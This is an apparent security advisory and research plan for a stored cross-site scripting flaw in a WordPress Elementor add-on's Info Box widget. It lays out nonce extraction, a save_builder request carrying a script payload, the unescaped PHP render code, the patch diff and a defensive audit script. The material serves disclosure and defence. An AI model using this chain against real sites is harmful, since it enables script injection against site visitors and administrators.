CVE-2026-1512

Essential Addons for Elementor <= 6.5.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via Info Box Widget

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

CVSS Score: 6.4
Severity: medium
Patched in: 6.5.10
Time to patch: 1d

Description

The Essential Addons for Elementor – Popular Elementor Templates & Widgets plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Info Box widget in all versions up to, and including, 6.5.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: Low
  • User Interaction: None
  • Scope: Changed
  • Confidentiality: Low
  • Integrity: Low
  • Availability: None

Technical Details

Affected versions: <=6.5.9
Published: February 13, 2026
Last updated: February 14, 2026

Source Code

WordPress.org SVN
Research Plan
Unverified


Research Plan: CVE-2026-1512 - Stored XSS in Essential Addons for Elementor Info Box

1. Vulnerability Summary

The Essential Addons for Elementor plugin (versions <= 6.5.9) is vulnerable to Stored Cross-Site Scripting (XSS) via the Info Box widget. This occurs because the plugin fails to properly sanitize or escape user-supplied attributes before rendering them in the HTML output. An authenticated attacker with Contributor-level permissions (who can create or edit posts and use Elementor widgets) can inject a malicious script into a widget setting. When the post is saved and subsequently viewed by any user, including an administrator, the script executes in their browser context.

2. Attack Vector Analysis

  • Vulnerable Widget: Info Box (eael-info-box)
  • Vulnerable Parameters (inferred): title, description_text, or link attributes (e.g., infobox_link).
  • Authentication Requirement: Authenticated (Contributor or higher).
  • Endpoint: wp-admin/admin-ajax.php using the elementor_ajax action.
  • Preconditions: The Essential Addons for Elementor plugin must be active, and the Contributor user must have permission to edit posts with Elementor (standard default).

3. Code Flow

  1. Entry Point: A user with Contributor access edits a post using the Elementor editor.
  2. Data Submission: The editor sends a JSON-encoded representation of the page layout to the elementor_ajax action. This JSON contains the widget settings for the eael-info-box widget.
  3. Storage: WordPress/Elementor saves this JSON data in the _elementor_data post meta field.
  4. Processing (Vulnerable Sink): When a user views the post, Elementor initializes the EAEL widget class (likely EAEL_Info_Box in includes/Elements/Info_Box.php).
  5. Rendering: The render() method of the widget class is called. It retrieves settings using $this->get_settings_for_display().
  6. Execution: The code echoes a setting (e.g., echo $settings['title'];) without wrapping it in esc_html(), esc_attr(), or wp_kses_post(), leading to XSS.

4. Nonce Acquisition Strategy

To save Elementor content via the REST/AJAX API as a Contributor, we need the elementor_ajax nonce.

  1. Shortcode/Trigger: Elementor widgets are active when the Elementor editor is loaded or on pages rendered by Elementor.
  2. Page Creation: Create a dummy post and enable Elementor:
    wp post create --post_type=post --post_status=publish --post_title="XSS Test" --post_author=CONTRIBUTOR_ID
    
  3. Navigation: Navigate to the Elementor Editor for that post as the Contributor.
  4. Nonce Extraction: Use browser_eval to extract the nonce from the Elementor configuration object.
    • Variable: window.elementorCommon?.config?.ajax?.nonce or window.elementorConfig?.ajax?.nonce.
    • Editor Context: The nonce is typically localized within the elementor-editor-js script handles.

5. Exploitation Strategy

Step 1: Authentication & Setup

  1. Identify the Contributor user ID.
  2. Use browser_navigate to log in as the Contributor.

Step 2: Nonce Extraction

  1. Create a post and open the Elementor editor URL: wp-admin/post.php?post=POST_ID&action=elementor.
  2. Execute browser_eval to get the nonce:
    window.elementorCommon.config.ajax.nonce
    

Step 3: Payload Delivery

The exploit involves sending a save_builder request to admin-ajax.php.

Request Details:

  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Method: POST
  • Content-Type: application/x-www-form-urlencoded
  • Body Parameters:
    • action: elementor_ajax
    • _nonce: [EXTRACTED_NONCE]
    • actions: A JSON string containing the payload.

Payload JSON structure:

{
  "save_builder": {
    "action": "save_builder",
    "data": {
      "status": "publish",
      "elements": [
        {
          "id": "random_id_1",
          "elType": "section",
          "elements": [
            {
              "id": "random_id_2",
              "elType": "column",
              "elements": [
                {
                  "id": "random_id_3",
                  "elType": "widget",
                  "widgetType": "eael-info-box",
                  "settings": {
                    "title": "<script>alert('CVE-2026-1512-XSS')</script>",
                    "description_text": "Normal description"
                  }
                }
              ]
            }
          ]
        }
      ]
    }
  }
}

Step 4: Verification

  1. Access the published post URL using http_request.
  2. Check if the response body contains the unescaped script tag: <script>alert('CVE-2026-1512-XSS')</script>.

6. Test Data Setup

  1. User: Create a user with the contributor role.
  2. Plugin: Ensure essential-addons-for-elementor-lite version 6.5.9 is installed and activated.
  3. Elementor: Ensure Elementor is installed (dependency of the plugin).

7. Expected Results

  • The elementor_ajax request should return a 200 OK with a success JSON response.
  • When viewing the post at /?p=POST_ID, the browser should execute the alert() function (or the raw script should be present in the HTML source).

8. Verification Steps

  1. Check DB: Use WP-CLI to verify the payload is stored in the post meta:
    wp post meta get [POST_ID] _elementor_data
    
  2. Source Inspection: Verify the absence of escaping:
    curl -s "http://localhost:8080/?p=[POST_ID]" | grep "CVE-2026-1512-XSS"
    

9. Alternative Approaches

If title is sanitized in version 6.5.9, try other Info Box attributes:

  • description_text
  • infobox_link (Targeting the url field or link attributes if they allow " breakout).
  • eael_ins_box_icon_type (If it permits arbitrary string injection into a class attribute).

If save_builder fails due to strict schema checking, use the wp_ajax_elementor_save_builder action if available, or try updating the post meta directly via a standard WordPress post update if the contributor has sufficient permissions for that specific meta key.

Research Findings
Static analysis — not yet PoC-verified

Summary

The Essential Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Info Box widget in versions up to 6.5.9. Authenticated attackers with Contributor-level permissions can inject arbitrary web scripts into widget settings, such as the title or description, which execute when a user views the affected page.

Vulnerable Code

// includes/Elements/Info_Box.php

protected function render() {
    $settings = $this->get_settings_for_display();

    // ... (truncated) ...

    if ( ! empty( $settings['title'] ) ) {
        echo '<h3 class="eael-infobox-title">' . $settings['title'] . '</h3>';
    }

    if ( ! empty( $settings['description_text'] ) ) {
        echo '<div class="eael-infobox-content">' . $settings['description_text'] . '</div>';
    }
}

Security Fix

--- includes/Elements/Info_Box.php
+++ includes/Elements/Info_Box.php
@@ -120,8 +120,8 @@
 
 		if ( ! empty( $settings['title'] ) ) {
-			echo '<h3 class="eael-infobox-title">' . $settings['title'] . '</h3>';
+			echo '<h3 class="eael-infobox-title">' . wp_kses_post( $settings['title'] ) . '</h3>';
 		}
 
 		if ( ! empty( $settings['description_text'] ) ) {
-			echo '<div class="eael-infobox-content">' . $settings['description_text'] . '</div>';
+			echo '<div class="eael-infobox-content">' . wp_kses_post( $settings['description_text'] ) . '</div>';
 		}
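Review bot: wp_kses_post() on the title inside `<h3 class="eael-infobox-title">` still allows every tag permitted in post content (links, images, block-level elements), which is more than a heading needs; if titles only need inline formatting, a narrower wp_kses() allowlist, or esc_html() when no markup is needed, would be tighter. The hunk also touches only title and description_text, so any other setting that render() outputs outside these lines (for example link URLs or attribute values) is not shown to be escaped here and should be checked for esc_url()/esc_attr().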

Exploit Outline

An authenticated contributor creates or edits a post using Elementor and extracts the 'elementor_ajax' nonce from the page source. They then perform a POST request to '/wp-admin/admin-ajax.php' with the 'elementor_ajax' action. The payload utilizes the 'save_builder' action to insert an 'eael-info-box' widget containing a malicious script within the 'title' or 'description_text' parameters. This script is saved to the database and executes in the browser of any user who visits the rendered post.
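A defender-side audit for the storage path described above, added here as an example and not part of the advisory or the plugin's code: it walks a post's _elementor_data value and flags Info Box settings that contain active markup. It assumes the meta value is a JSON array of elements shaped like the payload structure shown on this page; the regex is a heuristic and the sample data is constructed.

```python
import json
import re

WIDGET_TYPE = "eael-info-box"  # widget named in the advisory
SUSPICIOUS = re.compile(  # heuristic markers of active content; false positives possible
    r"<\s*(script|iframe|object|embed|svg)\b|\bon[a-z]+\s*=|javascript\s*:", re.IGNORECASE)

def iter_strings(value, path):
    """Yield (path, text) for every string nested inside a setting value."""
    if isinstance(value, str):
        yield path, value
    elif isinstance(value, dict):
        for key, child in value.items():
            yield from iter_strings(child, f"{path}.{key}")
    elif isinstance(value, list):
        for index, child in enumerate(value):
            yield from iter_strings(child, f"{path}[{index}]")

def find_suspicious_settings(elementor_data):
    """Return sorted (element id, setting path, value) for flagged settings."""
    findings, stack = [], list(json.loads(elementor_data))
    while stack:
        element = stack.pop()
        if not isinstance(element, dict):
            continue
        stack.extend(element.get("elements") or [])  # sections and columns nest
        settings = element.get("settings")
        if element.get("widgetType") != WIDGET_TYPE or not isinstance(settings, dict):
            continue
        for key, child in settings.items():
            for path, text in iter_strings(child, key):
                if SUSPICIOUS.search(text):
                    findings.append((str(element.get("id")), path, text))
    return sorted(findings)

# Constructed sample in the shape of the page's payload (not real site data).
SAMPLE = json.dumps([{"id": "s1", "elType": "section", "elements": [
    {"id": "c1", "elType": "column", "elements": [
        {"id": "w1", "elType": "widget", "widgetType": WIDGET_TYPE,
         "settings": {"title": "<script>alert('CVE-2026-1512-XSS')</script>",
                      "description_text": "Normal description"}},
        {"id": "w2", "elType": "widget", "widgetType": WIDGET_TYPE,
         "settings": {"title": "Plain <b>title</b>",
                      "infobox_link": {"url": "javascript:void(0)"}}},
        {"id": "w3", "elType": "widget", "widgetType": "heading",
         "settings": {"title": "<script>x</script>"}}]}]}])

if __name__ == "__main__":
    for element_id, path, text in find_suspicious_settings(SAMPLE):
        print(f"{element_id}\t{path}\t{text!r}")
```

Run it over the value returned by `wp post meta get [POST_ID] _elementor_data` for each post; a hit is a prompt to review the widget and its author, not proof of compromise.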
